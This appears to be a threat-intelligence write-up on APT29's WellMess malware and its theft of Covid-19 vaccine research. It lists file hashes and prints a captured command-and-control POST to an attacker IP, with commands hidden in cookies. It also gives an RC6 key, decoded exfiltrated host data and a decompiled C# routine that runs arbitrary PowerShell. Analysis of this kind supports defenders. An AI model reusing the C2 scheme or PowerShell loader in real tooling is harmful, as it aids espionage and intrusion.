Initial Access Tactic Used by APT-29 WellMess
APT29, is a hacker group thought to be associated with the Russian state and intelligence, according to information obtained by NSA and various cyber security companies. “APT” means “Advanced Persistent Threat”. APT29 hacker group was attacked by cyber security companies. Cozy Bear, CozyDuke And dukes It has been given various nicknames such as.
The APT-29 group carried out its attacks in a highly planned and complex manner. WellMess malware was used in one of the attacks.
WellMess Malware
In order to steal vaccine-related research information from companies researching the Covid-19 vaccine and universities carrying out R&D activities, data theft was carried out through these systems by using security vulnerabilities in software such as Citrix, Pulse Secure, FortiGate, and Zimbra. Installed on vulnerable systems WellMess Malware is a Command and Control tool that allows attackers to run command lines, upload or download files on the target system, is used as Post Exploitation and provides encrypted communication.
There is the ELF format for Linux systems and the 32-bit PE format for running on Windows operating systems.
SHA-256 Hash values
- 0b8e6a11adaa3df120ec15846bb966d674724b6b92eae34d63b665e0698e0193 (Golang&ELF)
- bec1981e422c1e01c14511d384a33c9bcc66456c1274bbbac073da825a3f537d (Golang&PE)
- 2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41 (.Net&PE)
When the malware is run on the target device, it communicates encryptedly with the Command and Control server controlled by the attackers. After this stage, attackers take a Reverse Shell to execute code on the target system, collect Domain Group, system and network information and move on to the next stage to infiltrate another system.
WellMess Web Traffic
POST/HTTP/1.1
Host: 141.98.212.55:53
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
Content-Length: 422
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C; OVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc+Ew%2Cy5O+Y%2CXTx%2C+Of7mNHE+PMvR+ReAze6+P15ihyA.+zysw+USxJ8+nxu3p6D+tkFDV8w++++++
Accept-Encoding: gzip
DZ0 rUtgNTf e,j:gB DFd dLSYB mq53txH 8JYY75r EQXyIUk 2FqYSrc. xscOr3E rzbl Q494 Gvkb1q sifD6 pog q0Ybz4D asij. 26sQ PkMZPh1 IyV 8VW 0C3038b QpTy8Cf z6mJw oeg. 6MG8,lQ ymdPXR q1tRd Fxg brhM 7cp Zf9JPKV CcKyKPK. OFdOqE 6XO oL8kKA qnq 9c2Yc9 ,xm6Gdy ra9 ORzvq. 3BX8q 6rE 2:H 1ALG8G N7yX 8hn3aNR kHykST9 KucSC2. b0l LJBc6i 9hK2 ZtJ1 jLi9cUA 7VRh G6PGAU qM9n5FD. bTy YMzPKF KKnk0i TyYK SMAV sbE 2Jflrk yPmCpN. 2X35q5 JhXg
Attackers send commands to the target device via Cookies via Web traffic. The sent command is encrypted with RC6 and encoded with Base64. (Figure 1-2-3)
(Figure 1)
(Figure-2)
(Figure-3)
The WellMess variant (.NET version) developed for Windows operating systems uses Powershell to exploit systems such as Active Directory on the target device.
private static string Pshell(string script)
{
string empty = string.Empty;
Collection collection;
using (Runspace runspace = RunspaceFactory.CreateRunspace())
{
try
{
runspace.Open();
using (PowerShell powerShell = PowerShell.Create())
{
powerShell.Runspace = runspace;
ScriptBlock scriptBlock = ScriptBlock.Create(script);
powerShell.AddCommand(“Invoke-Command”).AddParameter(“ScriptBlock”, (object) scriptBlock);
collection = powerShell.Invoke();
}
}
finally
{
runspace.Close();
}
}
foreach (PSObject psObject in collection)
empty += psObject.ToString();
return empty;
}
Encrypted Connection Established by Attackers with the Target Device
RC6 key used to encrypt incoming and outgoing data:
- OHVbn3Fdv/sgvP9VRO/9OQ==
The command sent encrypted to the target system by the attackers:
- HNX7A5nA=UUn5+2g6J+emwEU+MSkFqW+FAtoNc+dtFnr.+dHFn3ip+P8I+r19+B7s+UM571cp+j6hf+BvdjukE+YxeSiW.+SNXbt+VIB4fxC+CLa9el+eVHm+RspIMTQ+Z57y5+ZyY5 tA6
Web traffic coming from the target system encrypted:
- <;head;>3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855<;head ;><;title;>rc<;title;><;service;><;service;>
In the last stage, the unencrypted and encoded data coming to the attackers
200.200.200.221||user|user e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
In summary,
APT-29 group acts in the target systems in the most secret and silent way possible by performing Cyber Espionage (they generally use ports 443, 80, 53 for connection). If the importance of the data to be stolen is high, it moves much slower in the target system. After completing their operations and obtaining the data they want, they are very careful not to leave a trace in the system.
The most important lesson to be learned from such attacks is that companies should keep the software they use regularly updated. By updating, critical security vulnerabilities arising from these software can be significantly prevented from being exploited by threat actors.